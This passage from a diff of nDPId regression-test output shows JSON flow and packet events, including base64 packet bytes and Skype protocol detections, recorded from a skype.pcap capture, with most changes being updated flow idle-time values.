{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1431969712981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712981,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoyL5AAEAGfAvAqAEiW77YfcO9MD57jsMtWI4CD1AQIAAMeQAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1431969712981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712981,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoyL5AAEAGfAvAqAEiW77YfcO9MD57jsMtWI4CD1AQIAAMeQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1431969713175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713175,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoTzkAAEARqBjAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1431969713177,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969713177,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYIAAEAB8QPAqAEBwKgBIgMDgJYAAAAARQAAKE85AABAEagYwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} 
-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1431969713715,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713715,"pkt":"0NQSxnP1PBXCt3IOCABFAAAorjMAAEARSR7AqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1431969713717,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969713717,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYMAAEAB8QLAqAEBwKgBIgMDgJYAAAAARQAAKK4zAABAEUkewKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713736,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969713736,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969713736,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGB5AAEAGLJTAqAEiW77YfcO+MD4D6992AAAAALAC\/\/+KswAAAgQFtAEDAwUBAQgKPiOgwQAAAAAEAgAA"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1431969713779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969713779,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0e5xAAPUGFBlbvth9wKgBIjA+w7686z9CA+vfd4ASH\/6FhgAAAgQFoAEDAwQBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713736,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969713736,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969713736,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGB5AAEAGLJTAqAEiW77YfcO+MD4D6992AAAAALAC\/\/+KswAAAgQFtAEDAwUBAQgKPiOgwQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1431969713779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969713779,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0e5xAAPUGFBlbvth9wKgBIjA+w7686z9CA+vfd4ASH\/6FhgAAAgQFoAEDAwQBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuRSsAAEARjAjAqAEisBo3pzLd+R0AGvy6nPQCqlUgKb9nOC7NdHVpaZsV"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -848,84 +848,84 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuUbAAAEARRubAqAEiQTffJzLdAbsAGjQZnQ4ChKdksriBAZEnlRRV2r4X"} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431969714207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969714207,"pkt":"0NQSxnP1PBXCt3IOCABFAAAofgBAAEAGxsnAqAEiW77YfcO\/AbtO2k11ZDyjq1AQIAAwHAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMR1AAEAGWiPAqAEiTKehBsPATzJsmy7uAAAAALAC\/\/\/3pQAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtnFAAEAGcsPAqAEiR+4Hy8PBSU++p132AAAAALAC\/\/8aaAAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOeJAAEAGfjbAqAEiBfi63cPCeSJZV8ukAAAAALAC\/\/9xGAAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714399,"flow_last_seen":1431969714399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431969714399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714399,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMoNAAEAGzS3AqAEiVh8jHsPD6OVaW8KbAAAAALAC\/\/9Q8QAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431969714471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714471,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OCJAAHEGlpJWHyMewKgBIujlw8M6uTMdWlvCnKASIADQQwAAAgQFrAEDAwgEAggKABoDtj4jo0A="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431969714471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714471,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0C5pAAEAG9CLAqAEiVh8jHsPD6OVaW8KcOrkzHoAQECwOlQAAAQEICj4jo4gAGgO2"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431969714516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714516,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzQFAAHIGuRYF+LrdwKgBInkiw8JDt9yLWVfLpbASRBDtIwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431969714516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714516,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0avhAAEAGTSzAqAEiBfi63cPCeSJZV8ulQ7fcjIAQECx\/8gAAAQEICj4jo7UAAAAA"} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431969714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714616,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9bZAAHMGAH5H7gfLwKgBIklPw8GfDHVAvqdd97AS\/\/\/meAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431969714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714616,"pkt":"0NQSxnP1PBXCt3IOCABFAAA092tAAEAGMdXAqAEiR+4Hy8PBSU++p133nwx1QYAQECw01gAAAQEICj4jpBYAAAAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431969714686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714686,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw8Ds1RmabJsu76AScSD0JwAAAgQFrAQCCAq+oN5GPiOjPwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1431969714686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714686,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08xxAAEAGmC\/AqAEiTKehBsPATzJsmy7v7NUZm4AQECyCxgAAAQEICj4jpFm+oN5G"} 
